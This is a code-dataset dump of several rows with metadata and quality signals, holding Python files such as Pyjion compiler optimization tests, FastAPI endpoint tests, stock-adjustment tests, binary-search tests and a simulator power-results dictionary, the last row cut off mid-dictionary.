hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
857c7fdcb91ccae36881eacab993a8bbafdcd284 | 166 | py | Python | smaug/python/ops/nn.py | mrbeann/smaug | 01ef7892bb25cb08c13cea6125efc1528a8de260 | [
"BSD-3-Clause"
] | 50 | 2020-06-12T19:53:37.000Z | 2022-03-30T15:05:34.000Z | smaug/python/ops/nn.py | mrbeann/smaug | 01ef7892bb25cb08c13cea6125efc1528a8de260 | [
"BSD-3-Clause"
] | 37 | 2020-06-23T17:28:42.000Z | 2021-10-21T05:30:36.000Z | smaug/python/ops/nn.py | mrbeann/smaug | 01ef7892bb25cb08c13cea6125efc1528a8de260 | [
"BSD-3-Clause"
] | 18 | 2020-06-17T19:59:23.000Z | 2022-02-15T07:40:47.000Z | from smaug.python.ops.nn_ops import *
from smaug.python.ops.activation_ops import *
from smaug.python.ops.recurrent import *
from smaug.python.ops.attention import *
| 33.2 | 45 | 0.807229 | 26 | 166 | 5.076923 | 0.346154 | 0.272727 | 0.454545 | 0.545455 | 0.590909 | 0.409091 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096386 | 166 | 4 | 46 | 41.5 | 0.88 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
a45d21825a48c6622ab14fe920de6fbbcff9b1b0 | 5,299 | py | Python | Tests/test_interns.py | AlexWaygood/Pyjion | 974bd3cf434fad23fbfa1ea9acf43e3387a5c21f | [
"MIT"
] | null | null | null | Tests/test_interns.py | AlexWaygood/Pyjion | 974bd3cf434fad23fbfa1ea9acf43e3387a5c21f | [
"MIT"
] | null | null | null | Tests/test_interns.py | AlexWaygood/Pyjion | 974bd3cf434fad23fbfa1ea9acf43e3387a5c21f | [
"MIT"
] | null | null | null | """Test the optimization of intern values (-5 to 256)"""
import pyjion
import pyjion.dis
import pytest
def assertNotOptimized(func, capsys) -> None:
assert not func()
assert pyjion.info(func)['compiled']
pyjion.dis.dis(func)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_RICHCMP_TOKEN" in captured.out
def assertOptimized(func, capsys) -> None:
assert not func()
assert pyjion.info(func)['compiled']
pyjion.dis.dis(func)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "MethodTokens.METHOD_RICHCMP_TOKEN" not in captured.out
@pytest.mark.optimization(level=1)
def test_const_compare(capsys):
def _f():
a = 1
b = 2
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_compare_big_left(capsys):
def _f():
a = 1000
b = 2
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_from_builtin(capsys):
def _f():
a = 2
b = int("3")
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_compare_big_right(capsys):
def _f():
a = 1
b = 2000
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_compare_big_both(capsys):
def _f():
a = 1000
b = 2000
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_const_not_integer(capsys):
def _f():
a = 2
b = "2"
return a == b
assertNotOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_float_compare(capsys):
def _f():
a = 2
b = 1.0
return a == b
assertOptimized(_f, capsys)
@pytest.mark.optimization(level=1)
def test_dict_key(capsys):
def _f():
a = {0: 'a'}
a[0] = 'b'
return a[0] == 'b'
assert _f()
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_DICT" in captured.out
@pytest.mark.optimization(level=1)
def test_dict_key_invalid_index(capsys):
def _f_subscr():
a = {0: 'a'}
return a[1] == 'b'
with pytest.raises(KeyError):
_f_subscr()
assert pyjion.info(_f_subscr)['compiled']
pyjion.dis.dis(_f_subscr)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_SUBSCR_DICT_HASH" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key(capsys):
def _f():
a = ['a']
a[0] = 'b'
return a[0] == 'b'
assert _f()
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key_builtin(capsys):
def _f():
a = list(('a',))
a[0] = 'b'
return a[0] == 'b'
assert _f()
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key_non_const(capsys):
def _f(b):
a = ['a']
a[b] = 'b'
return a[b] == 'b'
assert _f(0)
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" not in captured.out
assert "METHOD_STORE_SUBSCR_LIST" in captured.out
@pytest.mark.optimization(level=1)
def test_list_from_builtin_key_non_const(capsys):
def _f(b):
a = list(('a',))
a[b] = 'b'
return a[b] == 'b'
assert _f(0)
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_LIST_I" not in captured.out
assert "METHOD_STORE_SUBSCR_LIST" in captured.out
@pytest.mark.optimization(level=1)
def test_list_key_invalid_index(capsys):
def _f_subscr():
l = [0, 1, 2]
return l[4] == 'b'
with pytest.raises(IndexError):
_f_subscr()
assert pyjion.info(_f_subscr)['compiled']
pyjion.dis.dis(_f_subscr)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_SUBSCR_LIST_I" in captured.out
@pytest.mark.optimization(level=1)
def test_unknown_key_string_const(capsys):
def _f(x):
x['y'] = 'b'
return x['y'] == 'b'
assert _f({})
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_STORE_SUBSCR_DICT_HASH" in captured.out
@pytest.mark.optimization(level=1)
def test_unknown_int_string_const(capsys):
def _f(x):
x[10] = 'b'
return x[10] == 'b'
assert _f({})
assert pyjion.info(_f)['compiled']
pyjion.dis.dis(_f)
captured = capsys.readouterr()
assert "ldarg.1" in captured.out
assert "METHOD_SUBSCR_DICT_HASH" in captured.out
| 22.35865 | 66 | 0.63295 | 742 | 5,299 | 4.311321 | 0.101078 | 0.075023 | 0.09753 | 0.135042 | 0.889966 | 0.870272 | 0.8412 | 0.809315 | 0.795874 | 0.774617 | 0 | 0.019041 | 0.236837 | 5,299 | 236 | 67 | 22.45339 | 0.772008 | 0.009247 | 0 | 0.775862 | 0 | 0 | 0.098207 | 0.054157 | 0 | 0 | 0 | 0 | 0.304598 | 1 | 0.195402 | false | 0 | 0.017241 | 0 | 0.304598 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a4750427fba0dda946f61f156202cdd5702827ee | 3,783 | py | Python | Assignments/Assignment 4/fastAPIandStreamlit/test_SentimentAnalyzer.py | akashmdubey/CSYE-Big-Data-Intelligent-Analytics-Raw | 19848f73c3f46719c2daffae4d8e2ef91f372bb6 | [
"MIT"
] | null | null | null | Assignments/Assignment 4/fastAPIandStreamlit/test_SentimentAnalyzer.py | akashmdubey/CSYE-Big-Data-Intelligent-Analytics-Raw | 19848f73c3f46719c2daffae4d8e2ef91f372bb6 | [
"MIT"
] | null | null | null | Assignments/Assignment 4/fastAPIandStreamlit/test_SentimentAnalyzer.py | akashmdubey/CSYE-Big-Data-Intelligent-Analytics-Raw | 19848f73c3f46719c2daffae4d8e2ef91f372bb6 | [
"MIT"
] | null | null | null | #pytest testSentimentAnalyzer.py
from main2 import app
from fastapi.testclient import TestClient
client = TestClient(app)
access_token = "1234567asdfgh"
def test_read_item_bad_token1():
response = client.get("/deanonymize?user_input=NKE")
assert response.status_code == 200
def test_read_item_bad_token2():
response = client.get("/displayPIIEntitywithStar?UserInput=AGEN")
assert response.status_code == 200
def test_read_item_bad_token3():
response = client.get("Authentication?usrName=jayshil&usrPassword=jain")
assert response.status_code == 200
def test_read_item_bad_token4():
response = client.get("/sentiment?UserInput=AGEN")
assert response.status_code == 200
def test_read_item_bad_token5():
response = client.get("/deanonymize?user_input=AGEN")
assert response.status_code == 200
# def test_read_item_bad_token2():
# response = client.get("/getcolumnvalues/FILE_NAME", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token3():
# response = client.get("/getexperimentdatamachine/2/Prep", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token4():
# response = client.get("/knowexpwornstatus/worn", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token5():
# response = client.get("/getdatatool/worn", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token6():
# response = client.get("/knowexppassvisual/no", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token7():
# response = client.get("/getdatavisualinspection/no", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token8():
# response = client.get("/knowexpmachiningfinalized/yes", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_read_item_bad_token9():
# response = client.get("/getdatamachiningfinalized/no", headers={"access_token": access_token})
# assert response.status_code == 200
# def test_len_item_bad_token1():
# response = client.get("/getexpcnc/1", headers={"access_token": access_token})
# assert len(response.json()) == 1517469
# def test_len_item_bad_token2():
# response = client.get("/getcolumnvalues/FILE_NAME", headers={"access_token": access_token})
# assert len(response.json()) == 18
# def test_len_item_bad_token3():
# response = client.get("/getexperimentdatamachine/2/Prep", headers={"access_token": access_token})
# assert len(response.json()) == 220734
# def test_len_item_bad_token4():
# response = client.get("/knowexpwornstatus/worn", headers={"access_token": access_token})
# assert len(response.json()) == 56
# def test_len_item_bad_token5():
# response = client.get("/getdatatool/worn", headers={"access_token": access_token})
# assert len(response.json()) == 19107642
# def test_len_item_bad_token6():
# response = client.get("/knowexppassvisual/no", headers={"access_token": access_token})
# assert len(response.json()) == 21
# def test_len_item_bad_token7():
# response = client.get("/getdatavisualinspection/no", headers={"access_token": access_token})
# assert len(response.json()) == 5658061
# def test_len_item_bad_token8():
# response = client.get("/knowexpmachiningfinalized/yes", headers={"access_token": access_token})
# assert len(response.json()) == 78
# def test_len_item_bad_token9():
# response = client.get("/getdatamachiningfinalized/no", headers={"access_token": access_token})
# assert len(response.json()) == 3090279
| 47.886076 | 103 | 0.731959 | 468 | 3,783 | 5.617521 | 0.160256 | 0.146444 | 0.142259 | 0.155192 | 0.901483 | 0.865728 | 0.827691 | 0.827691 | 0.827691 | 0.791556 | 0 | 0.034848 | 0.127676 | 3,783 | 78 | 104 | 48.5 | 0.761818 | 0.759715 | 0 | 0.263158 | 0 | 0 | 0.210035 | 0.194866 | 0 | 0 | 0 | 0 | 0.263158 | 1 | 0.263158 | false | 0.052632 | 0.105263 | 0 | 0.368421 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
a480493fa83333bd387be1c036ccdbb3e7706428 | 25 | py | Python | src/riceprint/__init__.py | ssriceboat/riceprint | da9579087bc5641220587f36986129891f62672e | [
"MIT"
] | 6 | 2019-07-16T02:48:47.000Z | 2021-02-05T03:38:47.000Z | src/riceprint/__init__.py | ssriceboat/riceprint | da9579087bc5641220587f36986129891f62672e | [
"MIT"
] | null | null | null | src/riceprint/__init__.py | ssriceboat/riceprint | da9579087bc5641220587f36986129891f62672e | [
"MIT"
] | 1 | 2019-11-01T18:23:20.000Z | 2019-11-01T18:23:20.000Z | from .riceprint import *
| 12.5 | 24 | 0.76 | 3 | 25 | 6.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16 | 25 | 1 | 25 | 25 | 0.904762 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
f13099497b149a3ce83357d3ed155b855d1fb146 | 2,303 | py | Python | custom/ilsgateway/tests/handlers/loss_adjust.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | custom/ilsgateway/tests/handlers/loss_adjust.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | 1 | 2022-03-12T01:03:25.000Z | 2022-03-12T01:03:25.000Z | custom/ilsgateway/tests/handlers/loss_adjust.py | johan--/commcare-hq | 86ee99c54f55ee94e4c8f2f6f30fc44e10e69ebd | [
"BSD-3-Clause"
] | null | null | null | from corehq.apps.commtrack.models import StockState
from custom.ilsgateway.tanzania.reminders import LOSS_ADJUST_CONFIRM, SOH_CONFIRM
from custom.ilsgateway.tests import ILSTestScript
class ILSLossesAdjustmentsTest(ILSTestScript):
def setUp(self):
super(ILSLossesAdjustmentsTest, self).setUp()
def test_losses_adjustments(self):
script = """
5551234 > Hmk Id 400 Dp 569 Ip 678
5551234 < {0}
""".format(unicode(SOH_CONFIRM))
self.run_script(script)
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
for ps in StockState.objects.all():
self.assertEqual(self.user_fac1.location.linked_supply_point().get_id, ps.case_id)
self.assertTrue(0 != ps.stock_on_hand)
script = """
5551234 > um id -3 dp -5 ip 13
5551234 < {0}
""".format(unicode(LOSS_ADJUST_CONFIRM))
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
self.assertEqual(StockState.objects.get(sql_product__code="id").stock_on_hand, 397)
self.assertEqual(StockState.objects.get(sql_product__code="dp").stock_on_hand, 564)
self.assertEqual(StockState.objects.get(sql_product__code="ip").stock_on_hand, 691)
def test_losses_adjustments_la_word(self):
script = """
5551234 > Hmk Id 400 Dp 569 Ip 678
5551234 < {0}
""".format(unicode(SOH_CONFIRM))
self.run_script(script)
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
for ps in StockState.objects.all():
self.assertEqual(self.user_fac1.location.linked_supply_point().get_id, ps.case_id)
self.assertTrue(0 != ps.stock_on_hand)
script = """
5551234 > la id -3 dp -5 ip 13
5551234 < {0}
""".format(unicode(LOSS_ADJUST_CONFIRM))
self.run_script(script)
self.assertEqual(StockState.objects.count(), 3)
self.assertEqual(StockState.objects.get(sql_product__code="id").stock_on_hand, 397)
self.assertEqual(StockState.objects.get(sql_product__code="dp").stock_on_hand, 564)
self.assertEqual(StockState.objects.get(sql_product__code="ip").stock_on_hand, 691)
| 37.145161 | 94 | 0.661746 | 288 | 2,303 | 5.065972 | 0.243056 | 0.123372 | 0.17135 | 0.219328 | 0.788211 | 0.788211 | 0.788211 | 0.788211 | 0.788211 | 0.788211 | 0 | 0.062745 | 0.224924 | 2,303 | 61 | 95 | 37.754098 | 0.754622 | 0 | 0 | 0.782609 | 0 | 0 | 0.14416 | 0 | 0 | 0 | 0 | 0 | 0.304348 | 1 | 0.065217 | false | 0 | 0.065217 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f149759e266f5cc7873b41d88be56c857e237de3 | 4,591 | py | Python | test_python_toolbox/test_binary_search/test.py | hboshnak/python_toolbox | cb9ef64b48f1d03275484d707dc5079b6701ad0c | [
"MIT"
] | 119 | 2015-02-05T17:59:47.000Z | 2022-02-21T22:43:40.000Z | test_python_toolbox/test_binary_search/test.py | hboshnak/python_toolbox | cb9ef64b48f1d03275484d707dc5079b6701ad0c | [
"MIT"
] | 4 | 2019-04-24T14:01:14.000Z | 2020-05-21T12:03:29.000Z | test_python_toolbox/test_binary_search/test.py | hboshnak/python_toolbox | cb9ef64b48f1d03275484d707dc5079b6701ad0c | [
"MIT"
] | 14 | 2015-03-30T06:30:42.000Z | 2021-12-24T23:45:11.000Z | # Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''Test module for `binary_search`.'''
from python_toolbox import binary_search
from python_toolbox import nifty_collections
from python_toolbox import misc_tools
def test():
'''Test the basic workings of `binary_search`.'''
my_list = [0, 1, 2, 3, 4]
assert binary_search.binary_search(
my_list,
3,
misc_tools.identity_function,
binary_search.EXACT
) == 3
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.CLOSEST
) == 3
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.LOW
) == 3
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.HIGH
) == 4
assert binary_search.binary_search(
my_list,
3.2,
misc_tools.identity_function,
binary_search.BOTH
) == (3, 4)
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.BOTH
) == (None, 0)
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.LOW
) == None
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.HIGH
) == 0
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.HIGH_OTHERWISE_LOW
) == 0
assert binary_search.binary_search(
my_list,
-5,
misc_tools.identity_function,
binary_search.LOW_OTHERWISE_HIGH
) == 0
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.BOTH
) == (4, None)
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.LOW
) == 4
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.HIGH
) == None
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.LOW_OTHERWISE_HIGH
) == 4
assert binary_search.binary_search(
my_list,
100,
misc_tools.identity_function,
binary_search.HIGH_OTHERWISE_LOW
) == 4
assert binary_search.binary_search_by_index(
[(number * 10) for number in my_list],
32,
misc_tools.identity_function,
binary_search.BOTH
) == (3, 4)
assert binary_search.binary_search(
[],
32,
misc_tools.identity_function,
binary_search.BOTH
) == (None, None)
assert binary_search.binary_search(
[],
32,
misc_tools.identity_function,
) == None
def test_single_member():
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.LOW
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.HIGH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.HIGH_IF_BOTH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.LOW_IF_BOTH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.EXACT
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.BOTH
) == (7, 7)
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.CLOSEST
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.CLOSEST_IF_BOTH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.LOW_OTHERWISE_HIGH
) == 7
assert binary_search.binary_search(
[7],
7,
misc_tools.identity_function,
binary_search.HIGH_OTHERWISE_LOW
) == 7
| 21.65566 | 53 | 0.600305 | 522 | 4,591 | 4.923372 | 0.113027 | 0.401556 | 0.196109 | 0.261479 | 0.907782 | 0.907782 | 0.878988 | 0.841634 | 0.828405 | 0.783268 | 0 | 0.03102 | 0.318885 | 4,591 | 211 | 54 | 21.758294 | 0.790854 | 0.034851 | 0 | 0.907514 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16185 | 1 | 0.011561 | false | 0 | 0.017341 | 0 | 0.028902 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
2d01a52ea812db056044a8b9c093b02af72c2a26 | 68,632 | py | Python | benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMsoplex/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMsoplex/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | benchmarks/SimResults/combinations_spec_ml/old/cmp_bwavesgcccactusADMsoplex/power.py | TugberkArkose/MLScheduler | e493b6cbf7b9d29a2c9300d7dd6f0c2f102e4061 | [
"Unlicense"
] | null | null | null | power = {'BUSES': {'Area': 1.33155,
'Bus/Area': 1.33155,
'Bus/Gate Leakage': 0.00662954,
'Bus/Peak Dynamic': 0.0,
'Bus/Runtime Dynamic': 0.0,
'Bus/Subthreshold Leakage': 0.0691322,
'Bus/Subthreshold Leakage with power gating': 0.0259246,
'Gate Leakage': 0.00662954,
'Peak Dynamic': 0.0,
'Runtime Dynamic': 0.0,
'Subthreshold Leakage': 0.0691322,
'Subthreshold Leakage with power gating': 0.0259246},
'Core': [{'Area': 32.6082,
'Execution Unit/Area': 8.2042,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.114925,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.292956,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.69972,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.363149,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.628843,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
